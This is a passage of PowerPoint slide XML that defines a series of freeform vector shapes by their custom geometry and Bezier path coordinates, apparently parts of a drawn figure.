              <p:cNvPr id="944" name="Freeform 2935"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1275" y="-2646"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 89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90 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 90 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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5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4" y="224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9" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="201"/>
                      <a:pt x="89" y="171"/>
                      <a:pt x="89" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="140"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="90" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90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87" y="16"/>
                      <a:pt x="71" y="22"/>
                      <a:pt x="63" y="20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5" name="Freeform 2936"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1275" y="-2646"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 89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90 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 90 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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5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4" y="224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9" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="201"/>
                      <a:pt x="89" y="171"/>
                      <a:pt x="89" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="140"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="90" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90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87" y="16"/>
                      <a:pt x="71" y="22"/>
                      <a:pt x="63" y="20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6" name="Freeform 2937"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1157" y="-3033"/>
                <a:ext cx="470" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 199"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 199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9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6" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89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2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4"/>
                      <a:pt x="62" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75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1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60" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="231"/>
                      <a:pt x="199" y="218"/>
                      <a:pt x="192" y="194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7" name="Freeform 2938"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1157" y="-3033"/>
                <a:ext cx="470" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 199"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 199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9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6" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89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2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4"/>
                      <a:pt x="62" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75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1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60" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="231"/>
                      <a:pt x="199" y="218"/>
                      <a:pt x="192" y="19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8" name="Freeform 2939"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1360" y="-2554"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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9" name="Freeform 2940"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1202" y="-3033"/>
                <a:ext cx="376" cy="448"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 150 w 159"/>
                  <a:gd name="T1" fmla="*/ 49 h 190"/>
                  <a:gd name="T2" fmla="*/ 124 w 159"/>
                  <a:gd name="T3" fmla="*/ 24 h 190"/>
                  <a:gd name="T4" fmla="*/ 105 w 159"/>
                  <a:gd name="T5" fmla="*/ 18 h 190"/>
                  <a:gd name="T6" fmla="*/ 69 w 159"/>
                  <a:gd name="T7" fmla="*/ 72 h 190"/>
                  <a:gd name="T8" fmla="*/ 68 w 159"/>
                  <a:gd name="T9" fmla="*/ 181 h 190"/>
                  <a:gd name="T10" fmla="*/ 69 w 159"/>
                  <a:gd name="T11" fmla="*/ 72 h 190"/>
                  <a:gd name="T12" fmla="*/ 50 w 159"/>
                  <a:gd name="T13" fmla="*/ 14 h 190"/>
                  <a:gd name="T14" fmla="*/ 66 w 159"/>
                  <a:gd name="T15" fmla="*/ 8 h 190"/>
                  <a:gd name="T16" fmla="*/ 41 w 159"/>
                  <a:gd name="T17" fmla="*/ 2 h 190"/>
                  <a:gd name="T18" fmla="*/ 11 w 159"/>
                  <a:gd name="T19" fmla="*/ 12 h 190"/>
                  <a:gd name="T20" fmla="*/ 0 w 159"/>
                  <a:gd name="T21" fmla="*/ 73 h 190"/>
                  <a:gd name="T22" fmla="*/ 30 w 159"/>
                  <a:gd name="T23" fmla="*/ 84 h 190"/>
                  <a:gd name="T24" fmla="*/ 35 w 159"/>
                  <a:gd name="T25" fmla="*/ 47 h 190"/>
                  <a:gd name="T26" fmla="*/ 34 w 159"/>
                  <a:gd name="T27" fmla="*/ 164 h 190"/>
                  <a:gd name="T28" fmla="*/ 43 w 159"/>
                  <a:gd name="T29" fmla="*/ 174 h 190"/>
                  <a:gd name="T30" fmla="*/ 94 w 159"/>
                  <a:gd name="T31" fmla="*/ 188 h 190"/>
                  <a:gd name="T32" fmla="*/ 121 w 159"/>
                  <a:gd name="T33" fmla="*/ 169 h 190"/>
                  <a:gd name="T34" fmla="*/ 121 w 159"/>
                  <a:gd name="T35" fmla="*/ 112 h 190"/>
                  <a:gd name="T36" fmla="*/ 120 w 159"/>
                  <a:gd name="T37" fmla="*/ 112 h 190"/>
                  <a:gd name="T38" fmla="*/ 121 w 159"/>
                  <a:gd name="T39" fmla="*/ 112 h 190"/>
                  <a:gd name="T40" fmla="*/ 119 w 159"/>
                  <a:gd name="T41" fmla="*/ 87 h 190"/>
                  <a:gd name="T42" fmla="*/ 118 w 159"/>
                  <a:gd name="T43" fmla="*/ 75 h 190"/>
                  <a:gd name="T44" fmla="*/ 117 w 159"/>
                  <a:gd name="T45" fmla="*/ 70 h 190"/>
                  <a:gd name="T46" fmla="*/ 117 w 159"/>
                  <a:gd name="T47" fmla="*/ 69 h 190"/>
                  <a:gd name="T48" fmla="*/ 117 w 159"/>
                  <a:gd name="T49" fmla="*/ 70 h 190"/>
                  <a:gd name="T50" fmla="*/ 118 w 159"/>
                  <a:gd name="T51" fmla="*/ 75 h 190"/>
                  <a:gd name="T52" fmla="*/ 119 w 159"/>
                  <a:gd name="T53" fmla="*/ 87 h 190"/>
                  <a:gd name="T54" fmla="*/ 123 w 159"/>
                  <a:gd name="T55" fmla="*/ 112 h 190"/>
                  <a:gd name="T56" fmla="*/ 159 w 159"/>
                  <a:gd name="T57" fmla="*/ 105 h 190"/>
                  <a:gd name="T58" fmla="*/ 150 w 159"/>
                  <a:gd name="T59" fmla="*/ 49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9" h="190">
                    <a:moveTo>
                      <a:pt x="150" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="32"/>
                      <a:pt x="132" y="26"/>
                      <a:pt x="124" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="22"/>
                      <a:pt x="113" y="20"/>
                      <a:pt x="105" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="40"/>
                      <a:pt x="69" y="72"/>
                      <a:pt x="69" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="83"/>
                      <a:pt x="68" y="181"/>
                      <a:pt x="68" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="72"/>
                      <a:pt x="69" y="72"/>
                      <a:pt x="69" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="64"/>
                      <a:pt x="56" y="34"/>
                      <a:pt x="50" y="14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57" y="5"/>
                      <a:pt x="47" y="3"/>
                      <a:pt x="41" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="0"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="11" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="14"/>
                      <a:pt x="5" y="42"/>
                      <a:pt x="0" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="81"/>
                      <a:pt x="25" y="83"/>
                      <a:pt x="30" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="61"/>
                      <a:pt x="35" y="43"/>
                      <a:pt x="35" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="53"/>
                      <a:pt x="34" y="121"/>
                      <a:pt x="34" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="169"/>
                      <a:pt x="37" y="174"/>
                      <a:pt x="43" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="177"/>
                      <a:pt x="87" y="187"/>
                      <a:pt x="94" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="190"/>
                      <a:pt x="118" y="180"/>
                      <a:pt x="121" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="150"/>
                      <a:pt x="121" y="130"/>
                      <a:pt x="121" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="112"/>
                      <a:pt x="120" y="112"/>
                      <a:pt x="120" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="112"/>
                      <a:pt x="120" y="112"/>
                      <a:pt x="121" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="103"/>
                      <a:pt x="120" y="95"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="82"/>
                      <a:pt x="118" y="78"/>
                      <a:pt x="118" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="73"/>
                      <a:pt x="117" y="72"/>
                      <a:pt x="117" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="69"/>
                      <a:pt x="117" y="69"/>
                      <a:pt x="117" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="70"/>
                      <a:pt x="117" y="70"/>
                      <a:pt x="117" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="72"/>
                      <a:pt x="117" y="73"/>
                      <a:pt x="118" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="79"/>
                      <a:pt x="119" y="83"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="94"/>
                      <a:pt x="122" y="102"/>
                      <a:pt x="123" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="112"/>
                      <a:pt x="145" y="112"/>
                      <a:pt x="159" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="79"/>
                      <a:pt x="151" y="56"/>
                      <a:pt x="150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50" name="Freeform 2941"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1311" y="-3061"/>
                <a:ext cx="153" cy="96"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 65"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 65"/>
                  <a:gd name="T3" fmla="*/ 19 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 65"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 52 w 65"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 56 w 65"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 28 w 65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" h="41">
                    <a:moveTo>
                      <a:pt x="28" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="37"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="9" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="17"/>
                      <a:pt x="12" y="16"/>
                      <a:pt x="15" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="10"/>
                      <a:pt x="52" y="0"/>
                      <a:pt x="52" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="21"/>
                      <a:pt x="46" y="26"/>
                      <a:pt x="56" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="33"/>
                      <a:pt x="45" y="41"/>
                      <a:pt x="28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51" name="Freeform 2942"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1282" y="-3031"/>
                <a:ext cx="211" cy="446"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 89"/>
                  <a:gd name="T1" fmla="*/ 22 h 189"/>
                  <a:gd name="T2" fmla="*/ 71 w 89"/>
                  <a:gd name="T3" fmla="*/ 17 h 189"/>
                  <a:gd name="T4" fmla="*/ 18 w 89"/>
                  <a:gd name="T5" fmla="*/ 12 h 189"/>
                  <a:gd name="T6" fmla="*/ 26 w 89"/>
                  <a:gd name="T7" fmla="*/ 4 h 189"/>
                  <a:gd name="T8" fmla="*/ 7 w 89"/>
                  <a:gd name="T9" fmla="*/ 1 h 189"/>
                  <a:gd name="T10" fmla="*/ 3 w 89"/>
                  <a:gd name="T11" fmla="*/ 0 h 189"/>
                  <a:gd name="T12" fmla="*/ 0 w 89"/>
                  <a:gd name="T13" fmla="*/ 163 h 189"/>
                  <a:gd name="T14" fmla="*/ 9 w 89"/>
                  <a:gd name="T15" fmla="*/ 173 h 189"/>
                  <a:gd name="T16" fmla="*/ 60 w 89"/>
                  <a:gd name="T17" fmla="*/ 187 h 189"/>
                  <a:gd name="T18" fmla="*/ 87 w 89"/>
                  <a:gd name="T19" fmla="*/ 168 h 189"/>
                  <a:gd name="T20" fmla="*/ 85 w 89"/>
                  <a:gd name="T21" fmla="*/ 86 h 189"/>
                  <a:gd name="T22" fmla="*/ 89 w 89"/>
                  <a:gd name="T23" fmla="*/ 22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9" h="189">
                    <a:moveTo>
                      <a:pt x="89" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="21"/>
                      <a:pt x="79" y="19"/>
                      <a:pt x="71" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="36"/>
                      <a:pt x="20" y="21"/>
                      <a:pt x="18" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="3"/>
                      <a:pt x="26" y="4"/>
                      <a:pt x="26" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="7" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="168"/>
                      <a:pt x="3" y="173"/>
                      <a:pt x="9" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="176"/>
                      <a:pt x="53" y="186"/>
                      <a:pt x="60" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="189"/>
                      <a:pt x="84" y="179"/>
                      <a:pt x="87" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="149"/>
                      <a:pt x="86" y="94"/>
                      <a:pt x="85" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="51"/>
                      <a:pt x="89" y="33"/>
                      <a:pt x="89" y="22"/>
                    </a:cubicBez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52" name="Freeform 2943"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1287" y="-3187"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1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53" name="Freeform 2944"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1287" y="-3187"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39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54" name="Freeform 2945"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1282" y="-2773"/>
                <a:ext cx="206" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 87 w 87"/>
                  <a:gd name="T1" fmla="*/ 2 h 25"/>
                  <a:gd name="T2" fmla="*/ 61 w 87"/>
                  <a:gd name="T3" fmla="*/ 15 h 25"/>
                  <a:gd name="T4" fmla="*/ 34 w 87"/>
                  <a:gd name="T5" fmla="*/ 9 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 87"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 87"/>
                  <a:gd name="T9" fmla="*/ 10 h 25"/>
                  <a:gd name="T10" fmla="*/ 34 w 87"/>
                  <a:gd name="T11" fmla="*/ 19 h 25"/>
                  <a:gd name="T12" fmla="*/ 61 w 87"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 87 w 87"/>
                  <a:gd name="T15" fmla="*/ 12 h 25"/>
                  <a:gd name="T16" fmla="*/ 87 w 87"/>
                  <a:gd name="T17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25">
                    <a:moveTo>
                      <a:pt x="87" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="6"/>
                      <a:pt x="70" y="15"/>
                      <a:pt x="61" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="15"/>
                      <a:pt x="34" y="9"/>
                      <a:pt x="34" y="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19"/>
                      <a:pt x="58" y="25"/>
                      <a:pt x="61" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="25"/>
                      <a:pt x="82" y="16"/>
                      <a:pt x="87" y="12"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="87" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
